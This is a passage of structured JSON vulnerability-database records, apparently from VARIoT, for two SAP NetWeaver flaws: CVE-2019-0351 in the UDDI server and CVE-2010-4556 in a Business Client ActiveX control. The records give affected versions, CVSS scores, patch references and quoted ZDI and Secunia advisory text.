"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201908-1845",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "netweaver",
"scope": "eq",
"trust": 1.8,
"vendor": "sap",
"version": "7.10"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 1.8,
"vendor": "sap",
"version": "7.20"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 1.8,
"vendor": "sap",
"version": "7.30"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 1.8,
"vendor": "sap",
"version": "7.31"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 1.8,
"vendor": "sap",
"version": "7.40"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 1.8,
"vendor": "sap",
"version": "7.50"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2019-008169"
},
{
"db": "NVD",
"id": "CVE-2019-0351"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:a:sap:netweaver:7.40:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sap:netweaver:7.10:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sap:netweaver:7.20:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sap:netweaver:7.30:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sap:netweaver:7.31:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sap:netweaver:7.50:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2019-0351"
}
]
},
"cve": "CVE-2019-0351",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"author": "NVD",
"availabilityImpact": "PARTIAL",
"baseScore": 6.5,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 8.0,
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "MEDIUM",
"trust": 1.0,
"userInteractionRequired": false,
"vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Low",
"accessVector": "Network",
"authentication": "Single",
"author": "NVD",
"availabilityImpact": "Partial",
"baseScore": 6.5,
"confidentialityImpact": "Partial",
"exploitabilityScore": null,
"id": "CVE-2019-0351",
"impactScore": null,
"integrityImpact": "Partial",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "Medium",
"trust": 0.8,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "NVD",
"availabilityImpact": "HIGH",
"baseScore": 8.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 2.8,
"impactScore": 5.9,
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
},
{
"attackComplexity": "Low",
"attackVector": "Network",
"author": "NVD",
"availabilityImpact": "High",
"baseScore": 8.8,
"baseSeverity": "High",
"confidentialityImpact": "High",
"exploitabilityScore": null,
"id": "CVE-2019-0351",
"impactScore": null,
"integrityImpact": "High",
"privilegesRequired": "Low",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "None",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
}
],
"severity": [
{
"author": "NVD",
"id": "CVE-2019-0351",
"trust": 1.8,
"value": "HIGH"
},
{
"author": "CNNVD",
"id": "CNNVD-201908-872",
"trust": 0.6,
"value": "HIGH"
}
]
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2019-008169"
},
{
"db": "NVD",
"id": "CVE-2019-0351"
},
{
"db": "CNNVD",
"id": "CNNVD-201908-872"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "A remote code execution vulnerability exists in the SAP NetWeaver UDDI Server (Services Registry), versions 7.10, 7.20, 7.30, 7.31, 7.40, 7.50. Because of this, an attacker can exploit Services Registry potentially enabling them to take complete control of the product, including viewing, changing, or deleting data by injecting code into the working memory which is subsequently executed by the application. It can also be used to cause a general fault in the product, causing the product to terminate. SAP NetWeaver UDDI server (Services Registry) Contains a buffer error vulnerability.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state",
"sources": [
{
"db": "NVD",
"id": "CVE-2019-0351"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-008169"
}
],
"trust": 1.62
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2019-0351",
"trust": 2.4
},
{
"db": "JVNDB",
"id": "JVNDB-2019-008169",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-201908-872",
"trust": 0.6
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2019-008169"
},
{
"db": "NVD",
"id": "CVE-2019-0351"
},
{
"db": "CNNVD",
"id": "CNNVD-201908-872"
}
]
},
"id": "VAR-201908-1845",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VARIoT devices database",
"id": null
}
],
"trust": 0.27111164
},
"last_update_date": "2023-12-18T11:59:45.995000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "SAP Security Patch Day - August 2019",
"trust": 0.8,
"url": "https://wiki.scn.sap.com/wiki/pages/viewpage.action?pageid=523998017"
},
{
"title": "SAP NetWeaver UDDI Server Security vulnerabilities",
"trust": 0.6,
"url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=96561"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2019-008169"
},
{
"db": "CNNVD",
"id": "CNNVD-201908-872"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "NVD-CWE-noinfo",
"trust": 1.0
},
{
"problemtype": "CWE-119",
"trust": 0.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2019-008169"
},
{
"db": "NVD",
"id": "CVE-2019-0351"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 1.6,
"url": "https://launchpad.support.sap.com/#/notes/2800779"
},
{
"trust": 1.6,
"url": "https://wiki.scn.sap.com/wiki/pages/viewpage.action?pageid=523998017"
},
{
"trust": 1.4,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-0351"
},
{
"trust": 0.8,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2019-0351"
},
{
"trust": 0.6,
"url": "https://vigilance.fr/vulnerability/sap-multiple-vulnerabilities-of-august-2019-30031"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2019-008169"
},
{
"db": "NVD",
"id": "CVE-2019-0351"
},
{
"db": "CNNVD",
"id": "CNNVD-201908-872"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "JVNDB",
"id": "JVNDB-2019-008169"
},
{
"db": "NVD",
"id": "CVE-2019-0351"
},
{
"db": "CNNVD",
"id": "CNNVD-201908-872"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2019-08-27T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2019-008169"
},
{
"date": "2019-08-14T14:15:16.807000",
"db": "NVD",
"id": "CVE-2019-0351"
},
{
"date": "2019-08-13T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201908-872"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2019-08-27T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2019-008169"
},
{
"date": "2020-08-24T17:37:01.140000",
"db": "NVD",
"id": "CVE-2019-0351"
},
{
"date": "2020-08-25T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201908-872"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201908-872"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "SAP NetWeaver UDDI server Buffer error vulnerability",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2019-008169"
},
{
"db": "CNNVD",
"id": "CNNVD-201908-872"
}
],
"trust": 1.4
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "buffer error",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201908-872"
}
],
"trust": 0.6
}
}
var-201012-0105
Vulnerability from variot
Stack-based buffer overflow in the SapThemeRepository ActiveX control (sapwdpcd.dll) in SAP NetWeaver Business Client allows remote attackers to execute arbitrary code via the (1) Load and (2) LoadTheme methods. SAP NetWeaver is the technical foundation for SAP Business Suite solutions, SAP xApps composite applications, partner solutions, and custom applications. Execute arbitrary code.
-- Vendor Response: SAP has issued an update to correct this vulnerability. More details can be found at:
https://service.sap.com/sap/support/notes/1519966
-- Disclosure Timeline: 2010-09-30 - Vulnerability reported to vendor 2010-12-14 - Coordinated public release of advisory
-- Credit: This vulnerability was discovered by: * Alexandr Polyakov, Alexey Sintsov from Digital Security Research Group
-- About the Zero Day Initiative (ZDI): Established by TippingPoint, The Zero Day Initiative (ZDI) represents a best-of-breed model for rewarding security researchers for responsibly disclosing discovered vulnerabilities.
Researchers interested in getting paid for their security research through the ZDI can find more information and sign-up at:
http://www.zerodayinitiative.com
The ZDI is unique in how the acquired vulnerability information is used. TippingPoint does not re-sell the vulnerability details or any exploit code. Instead, upon notifying the affected product vendor, TippingPoint provides its customers with zero day protection through its intrusion prevention technology. Explicit details regarding the specifics of the vulnerability are not exposed to any parties until an official vendor patch is publicly available. Furthermore, with the altruistic aim of helping to secure a broader user base, TippingPoint provides this vulnerability information confidentially to security vendors (including competitors) who have a vulnerability protection or mitigation product.
Our vulnerability disclosure policy is available online at:
http://www.zerodayinitiative.com/advisories/disclosure_policy/
Follow the ZDI on Twitter:
http://twitter.com/thezdi
. ----------------------------------------------------------------------
Secure your corporate defenses and reduce complexity in handling vulnerability threats with the new Secunia Vulnerability Intelligence Manager (VIM).
Request a free trial: http://secunia.com/products/corporate/vim/
TITLE: SAP NetWeaver Business Client "SapThemeRepository" ActiveX Control Buffer Overflow
SECUNIA ADVISORY ID: SA35796
VERIFY ADVISORY: Secunia.com http://secunia.com/advisories/35796/ Customer Area (Credentials Required) https://ca.secunia.com/?page=viewadvisory&vuln_id=35796
RELEASE DATE: 2010-12-22
DISCUSS ADVISORY: http://secunia.com/advisories/35796/#comments
AVAILABLE ON SITE AND IN CUSTOMER AREA: * Last Update * Popularity * Comments * Criticality Level * Impact * Where * Solution Status * Operating System / Software * CVE Reference(s)
http://secunia.com/advisories/35796/
ONLY AVAILABLE IN CUSTOMER AREA: * Authentication Level * Report Reliability * Secunia PoC * Secunia Analysis * Systems Affected * Approve Distribution * Remediation Status * Secunia CVSS Score * CVSS
https://ca.secunia.com/?page=viewadvisory&vuln_id=35796
ONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI: * AUTOMATED SCANNING
http://secunia.com/vulnerability_scanning/personal/ http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/
DESCRIPTION: A vulnerability has been reported in SAP NetWeaver Business Client, which can be exploited by malicious people to compromise a user's system.
SOLUTION: Apply patch (please see SAP's security note 1519966).
PROVIDED AND/OR DISCOVERED BY: Alexandr Polyakov and Alexey Sintsov, Digital Security Research Group, reported via ZDI.
ORIGINAL ADVISORY: SAP: https://service.sap.com/sap/support/notes/1519966
ZDI: http://www.zerodayinitiative.com/advisories/ZDI-10-290/
OTHER REFERENCES: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/
DEEP LINKS: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/
EXTENDED DESCRIPTION: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/
EXTENDED SOLUTION: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/
EXPLOIT: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/
About: This Advisory was delivered by Secunia as a free service to help private users keeping their systems up to date against the latest vulnerabilities.
Subscribe: http://secunia.com/advisories/secunia_security_advisories/
Definitions: (Criticality, Where etc.) http://secunia.com/advisories/about_secunia_advisories/
Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor.
Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org
Show details on source website
{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201012-0105",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "netweaver business client",
"scope": null,
"trust": 2.0,
"vendor": "sap",
"version": null
},
{
"model": "netweaver business client",
"scope": "eq",
"trust": 1.0,
"vendor": "sap",
"version": "*"
},
{
"model": "netweaver",
"scope": null,
"trust": 0.7,
"vendor": "sap",
"version": null
},
{
"model": "netweaver business client",
"scope": "eq",
"trust": 0.3,
"vendor": "sap",
"version": "0"
},
{
"model": null,
"scope": "eq",
"trust": 0.2,
"vendor": "netweaver business client",
"version": "*"
}
],
"sources": [
{
"db": "IVD",
"id": "0cb053f6-1fa6-11e6-abef-000c29c66e3d"
},
{
"db": "ZDI",
"id": "ZDI-10-290"
},
{
"db": "CNVD",
"id": "CNVD-2010-3251"
},
{
"db": "BID",
"id": "45396"
},
{
"db": "JVNDB",
"id": "JVNDB-2010-003515"
},
{
"db": "NVD",
"id": "CVE-2010-4556"
},
{
"db": "CNNVD",
"id": "CNNVD-201012-253"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:a:sap:netweaver_business_client:*:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2010-4556"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Alexandr Polyakov, Alexey Sintsov from Digital Security Research Group",
"sources": [
{
"db": "ZDI",
"id": "ZDI-10-290"
},
{
"db": "BID",
"id": "45396"
}
],
"trust": 1.0
},
"cve": "CVE-2010-4556",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "NVD",
"availabilityImpact": "COMPLETE",
"baseScore": 9.3,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 8.6,
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "HIGH",
"trust": 1.0,
"userInteractionRequired": true,
"vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Medium",
"accessVector": "Network",
"authentication": "None",
"author": "NVD",
"availabilityImpact": "Complete",
"baseScore": 9.3,
"confidentialityImpact": "Complete",
"exploitabilityScore": null,
"id": "CVE-2010-4556",
"impactScore": null,
"integrityImpact": "Complete",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "High",
"trust": 0.8,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "ZDI",
"availabilityImpact": "COMPLETE",
"baseScore": 9.0,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"id": "ZDI-10-290",
"impactScore": 8.5,
"integrityImpact": "PARTIAL",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "HIGH",
"trust": 0.7,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:C",
"version": "2.0"
},
{
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "IVD",
"availabilityImpact": "COMPLETE",
"baseScore": 9.3,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 8.6,
"id": "0cb053f6-1fa6-11e6-abef-000c29c66e3d",
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"severity": "HIGH",
"trust": 0.2,
"vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C",
"version": "2.9 [IVD]"
}
],
"cvssV3": [],
"severity": [
{
"author": "NVD",
"id": "CVE-2010-4556",
"trust": 1.8,
"value": "HIGH"
},
{
"author": "ZDI",
"id": "ZDI-10-290",
"trust": 0.7,
"value": "HIGH"
},
{
"author": "CNNVD",
"id": "CNNVD-201012-253",
"trust": 0.6,
"value": "CRITICAL"
},
{
"author": "IVD",
"id": "0cb053f6-1fa6-11e6-abef-000c29c66e3d",
"trust": 0.2,
"value": "CRITICAL"
}
]
}
],
"sources": [
{
"db": "IVD",
"id": "0cb053f6-1fa6-11e6-abef-000c29c66e3d"
},
{
"db": "ZDI",
"id": "ZDI-10-290"
},
{
"db": "JVNDB",
"id": "JVNDB-2010-003515"
},
{
"db": "NVD",
"id": "CVE-2010-4556"
},
{
"db": "CNNVD",
"id": "CNNVD-201012-253"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Stack-based buffer overflow in the SapThemeRepository ActiveX control (sapwdpcd.dll) in SAP NetWeaver Business Client allows remote attackers to execute arbitrary code via the (1) Load and (2) LoadTheme methods. SAP NetWeaver is the technical foundation for SAP Business Suite solutions, SAP xApps composite applications, partner solutions, and custom applications. Execute arbitrary code. \n\n-- Vendor Response:\nSAP has issued an update to correct this vulnerability. More\ndetails can be found at:\n\nhttps://service.sap.com/sap/support/notes/1519966\n\n-- Disclosure Timeline:\n2010-09-30 - Vulnerability reported to vendor\n2010-12-14 - Coordinated public release of advisory\n\n-- Credit:\nThis vulnerability was discovered by:\n * Alexandr Polyakov, Alexey Sintsov from Digital Security Research Group\n\n-- About the Zero Day Initiative (ZDI):\nEstablished by TippingPoint, The Zero Day Initiative (ZDI) represents\na best-of-breed model for rewarding security researchers for responsibly\ndisclosing discovered vulnerabilities. \n\nResearchers interested in getting paid for their security research\nthrough the ZDI can find more information and sign-up at:\n\n http://www.zerodayinitiative.com\n\nThe ZDI is unique in how the acquired vulnerability information is\nused. TippingPoint does not re-sell the vulnerability details or any\nexploit code. Instead, upon notifying the affected product vendor,\nTippingPoint provides its customers with zero day protection through\nits intrusion prevention technology. Explicit details regarding the\nspecifics of the vulnerability are not exposed to any parties until\nan official vendor patch is publicly available. Furthermore, with the\naltruistic aim of helping to secure a broader user base, TippingPoint\nprovides this vulnerability information confidentially to security\nvendors (including competitors) who have a vulnerability protection or\nmitigation product. \n\nOur vulnerability disclosure policy is available online at:\n\n http://www.zerodayinitiative.com/advisories/disclosure_policy/\n\nFollow the ZDI on Twitter:\n\n http://twitter.com/thezdi\n\n\n. ----------------------------------------------------------------------\n\n\nSecure your corporate defenses and reduce complexity in handling vulnerability threats with the new Secunia Vulnerability Intelligence Manager (VIM). \n\nRequest a free trial: \nhttp://secunia.com/products/corporate/vim/\n\n\n----------------------------------------------------------------------\n\nTITLE:\nSAP NetWeaver Business Client \"SapThemeRepository\" ActiveX Control\nBuffer Overflow\n\nSECUNIA ADVISORY ID:\nSA35796\n\nVERIFY ADVISORY:\nSecunia.com\nhttp://secunia.com/advisories/35796/\nCustomer Area (Credentials Required)\nhttps://ca.secunia.com/?page=viewadvisory\u0026vuln_id=35796\n\nRELEASE DATE:\n2010-12-22\n\nDISCUSS ADVISORY:\nhttp://secunia.com/advisories/35796/#comments\n\nAVAILABLE ON SITE AND IN CUSTOMER AREA:\n * Last Update\n * Popularity\n * Comments\n * Criticality Level\n * Impact\n * Where\n * Solution Status\n * Operating System / Software\n * CVE Reference(s)\n\nhttp://secunia.com/advisories/35796/\n\nONLY AVAILABLE IN CUSTOMER AREA:\n * Authentication Level\n * Report Reliability\n * Secunia PoC\n * Secunia Analysis\n * Systems Affected\n * Approve Distribution\n * Remediation Status\n * Secunia CVSS Score\n * CVSS\n\nhttps://ca.secunia.com/?page=viewadvisory\u0026vuln_id=35796\n\nONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI:\n * AUTOMATED SCANNING\n\nhttp://secunia.com/vulnerability_scanning/personal/\nhttp://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/\n\nDESCRIPTION:\nA vulnerability has been reported in SAP NetWeaver Business Client,\nwhich can be exploited by malicious people to compromise a user\u0027s\nsystem. \n\nSOLUTION:\nApply patch (please see SAP\u0027s security note 1519966). \n\nPROVIDED AND/OR DISCOVERED BY:\nAlexandr Polyakov and Alexey Sintsov, Digital Security Research\nGroup, reported via ZDI. \n\nORIGINAL ADVISORY:\nSAP:\nhttps://service.sap.com/sap/support/notes/1519966\n\nZDI:\nhttp://www.zerodayinitiative.com/advisories/ZDI-10-290/\n\nOTHER REFERENCES:\nFurther details available in Customer Area:\nhttp://secunia.com/products/corporate/EVM/\n\nDEEP LINKS:\nFurther details available in Customer Area:\nhttp://secunia.com/products/corporate/EVM/\n\nEXTENDED DESCRIPTION:\nFurther details available in Customer Area:\nhttp://secunia.com/products/corporate/EVM/\n\nEXTENDED SOLUTION:\nFurther details available in Customer Area:\nhttp://secunia.com/products/corporate/EVM/\n\nEXPLOIT:\nFurther details available in Customer Area:\nhttp://secunia.com/products/corporate/EVM/\n\n----------------------------------------------------------------------\n\nAbout:\nThis Advisory was delivered by Secunia as a free service to help\nprivate users keeping their systems up to date against the latest\nvulnerabilities. \n\nSubscribe:\nhttp://secunia.com/advisories/secunia_security_advisories/\n\nDefinitions: (Criticality, Where etc.)\nhttp://secunia.com/advisories/about_secunia_advisories/\n\n\nPlease Note:\nSecunia recommends that you verify all advisories you receive by\nclicking the link. \nSecunia NEVER sends attached files with advisories. \nSecunia does not advise people to install third party patches, only\nuse those supplied by the vendor. \n\n----------------------------------------------------------------------\n\nUnsubscribe: Secunia Security Advisories\nhttp://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org\n\n----------------------------------------------------------------------\n\n\n",
"sources": [
{
"db": "NVD",
"id": "CVE-2010-4556"
},
{
"db": "JVNDB",
"id": "JVNDB-2010-003515"
},
{
"db": "ZDI",
"id": "ZDI-10-290"
},
{
"db": "CNVD",
"id": "CNVD-2010-3251"
},
{
"db": "BID",
"id": "45396"
},
{
"db": "IVD",
"id": "0cb053f6-1fa6-11e6-abef-000c29c66e3d"
},
{
"db": "PACKETSTORM",
"id": "96698"
},
{
"db": "PACKETSTORM",
"id": "96901"
}
],
"trust": 3.42
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2010-4556",
"trust": 2.9
},
{
"db": "ZDI",
"id": "ZDI-10-290",
"trust": 2.5
},
{
"db": "BID",
"id": "45396",
"trust": 2.5
},
{
"db": "SECUNIA",
"id": "35796",
"trust": 1.8
},
{
"db": "VUPEN",
"id": "ADV-2010-3239",
"trust": 1.6
},
{
"db": "SECTRACK",
"id": "1024890",
"trust": 1.6
},
